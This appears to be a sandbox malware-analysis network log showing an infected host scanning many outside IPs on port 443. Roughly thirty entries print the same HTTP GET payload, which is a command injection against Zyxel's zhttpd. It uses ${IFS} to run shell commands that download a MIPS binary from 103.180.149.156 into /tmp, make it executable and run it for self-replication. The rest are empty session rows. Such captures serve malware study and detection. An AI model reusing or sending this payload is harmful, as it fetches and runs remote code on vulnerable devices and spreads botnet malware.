                                                      Feb 2, 2024 06:36:14.087088108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9696192.168.2.143294845.29.132.3443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.087147951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9697192.168.2.1458150114.160.38.130443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.087176085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9698192.168.2.1460022181.248.73.29443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.087219954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9699192.168.2.1448120112.112.21.190443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.087251902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9700192.168.2.1451940100.147.145.89443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.087301970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9701192.168.2.144199025.21.174.18443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.087348938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9702192.168.2.1455244221.237.244.251443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.087366104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9703192.168.2.144771295.153.145.84443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.087436914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9704192.168.2.144022817.75.95.58443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.087471008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9705192.168.2.1455374163.194.229.184443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.087511063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9706192.168.2.144726019.47.56.28443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.087538004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9707192.168.2.143857049.167.76.100443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.087587118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9708192.168.2.1460180209.141.27.151443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:15.100820065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9709192.168.2.1456510151.80.225.189443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:15.101418972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9710192.168.2.1455144105.230.124.243443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:15.101562977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9711192.168.2.1434454188.47.21.75443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:15.101599932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9712192.168.2.1453274144.194.2.117443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:15.101629019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9713192.168.2.144143614.70.125.5443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:15.101694107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9714192.168.2.144823823.105.234.3443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:15.101735115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9715192.168.2.1447730149.53.137.239443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:15.101756096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9716192.168.2.14532729.227.214.252443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:15.101795912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9717192.168.2.143665662.90.86.206443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:15.101852894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9718192.168.2.1453728112.162.195.198443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:15.101896048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9719192.168.2.1460716185.196.39.135443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:15.101926088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9720192.168.2.1441738205.109.194.32443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:15.101975918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9721192.168.2.1444504179.71.31.226443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:15.102032900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9722192.168.2.145203460.189.5.242443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:15.102070093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9723192.168.2.1452872138.156.227.151443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:15.102082968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9724192.168.2.1450502182.97.63.180443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9725192.168.2.145221686.156.139.198443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9726192.168.2.14469309.238.161.37443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9727192.168.2.144362257.123.44.211443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9728192.168.2.1452124145.31.99.77443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9729192.168.2.144244695.174.246.146443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9730192.168.2.1434590115.131.195.20443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9731192.168.2.1454354208.240.149.11443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9732192.168.2.145634442.197.11.103443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9733192.168.2.1444316108.9.216.76443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9734192.168.2.145097012.127.9.104443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9735192.168.2.144350036.180.7.87443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9736192.168.2.1448582163.224.86.117443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9737192.168.2.143683464.21.84.138443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9738192.168.2.143790440.222.98.200443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9739192.168.2.1435546148.23.165.82443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9740192.168.2.1441954128.71.21.93443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9741192.168.2.1457814200.180.244.215443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9742192.168.2.1458798190.204.186.96443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9743192.168.2.144962617.116.210.146443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9744192.168.2.143874290.16.174.64443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9745192.168.2.1459570138.19.94.195443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9746192.168.2.144624250.63.7.66443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9747192.168.2.1451830112.194.183.242443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9748192.168.2.145952418.100.177.58443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9749192.168.2.1435600203.231.63.183443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9750192.168.2.145477090.86.213.108443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9751192.168.2.143381852.208.127.222443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9752192.168.2.144723498.153.79.236443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9753192.168.2.1438224176.31.210.163443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9754192.168.2.1442776167.24.79.54443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9755192.168.2.1450846134.237.231.11443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9756192.168.2.1441828106.177.128.230443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9757192.168.2.1435738219.46.24.194443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9758192.168.2.1435734195.160.62.92443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9759192.168.2.144073814.13.63.158443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9760192.168.2.145484841.84.109.88443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9761192.168.2.1454650205.153.53.76443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9762192.168.2.1449298179.150.110.115443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9763192.168.2.1443406121.217.111.235443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9764192.168.2.1455528164.53.92.62443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9765192.168.2.1458396145.30.203.27443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9766192.168.2.1457128176.126.222.25443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9767192.168.2.1447192124.130.10.26443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9768192.168.2.1456202212.129.118.66443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9769192.168.2.145996814.92.98.61443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9770192.168.2.1447924149.75.169.118443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9771192.168.2.1435644122.49.22.46443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9772192.168.2.144345293.158.215.60443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9773192.168.2.1441104100.34.108.182443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9774192.168.2.143677061.21.123.58443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9775192.168.2.1460704190.27.69.117443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9776192.168.2.1457916116.166.89.97443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9777192.168.2.143763067.65.0.204443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9778192.168.2.143789427.50.155.16443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9779192.168.2.144997843.105.136.214443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9780192.168.2.145205458.30.45.73443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9781192.168.2.144338040.58.44.91443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9782192.168.2.1453252148.220.213.21443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9783192.168.2.145750069.51.119.82443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9784192.168.2.1457518125.87.217.151443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9785192.168.2.144847054.171.129.252443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9786192.168.2.1447596208.129.237.209443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9787192.168.2.143436448.116.83.186443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9788192.168.2.146097685.142.173.68443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9789192.168.2.1439076208.65.96.123443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9790192.168.2.1448482176.226.104.40443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9791192.168.2.1435440136.119.48.125443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9792192.168.2.1453138156.198.0.232443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9793192.168.2.14444868.170.92.248443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9794192.168.2.144117886.184.42.174443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9795192.168.2.146091264.77.59.255443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9796192.168.2.1439152129.196.3.64443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9797192.168.2.145336244.217.169.42443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9798192.168.2.1454322150.243.112.249443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9799192.168.2.1436520204.142.182.35443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9800192.168.2.144602254.240.196.18443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9801192.168.2.1451238184.189.96.236443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9802192.168.2.1448500114.175.37.26443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9803192.168.2.143310454.170.52.88443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9804192.168.2.1453350221.36.38.189443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9805192.168.2.145467445.70.158.227443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9806192.168.2.14346648.120.96.248443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9807192.168.2.143977018.203.9.132443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9808192.168.2.1456144101.223.123.105443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9809192.168.2.1451306191.39.255.78443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9810192.168.2.145957212.205.238.220443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9811192.168.2.1460222190.150.173.172443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9812192.168.2.144014846.32.74.171443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9813192.168.2.1435994157.253.71.179443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9814192.168.2.1443618160.3.215.14443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9815192.168.2.144137284.202.32.21443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9816192.168.2.145650275.76.156.87443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9817192.168.2.1437024201.50.90.217443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9818192.168.2.1457428173.231.23.248443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9819192.168.2.1444410166.67.232.63443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9820192.168.2.145915289.110.11.115443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9821192.168.2.1436148196.96.34.0443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9822192.168.2.1445060171.65.86.213443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9823192.168.2.1456794205.109.175.161443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9824192.168.2.145685813.121.27.158443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9825192.168.2.1441718142.11.44.7443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9826192.168.2.144777425.202.34.197443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9827192.168.2.144790689.36.251.252443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9828192.168.2.1460080140.190.137.118443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9829192.168.2.1457700135.168.9.139443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9830192.168.2.1446852144.147.234.79443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9831192.168.2.1446912204.219.120.243443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9832192.168.2.144014875.135.71.32443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9833192.168.2.1455172218.87.137.184443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9834192.168.2.1445120104.32.219.101443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9835192.168.2.1455376202.80.82.108443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9836192.168.2.1460710191.85.0.23443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9837192.168.2.145567054.225.160.86443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9838192.168.2.1454450110.109.24.36443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9839192.168.2.14426065.6.54.241443
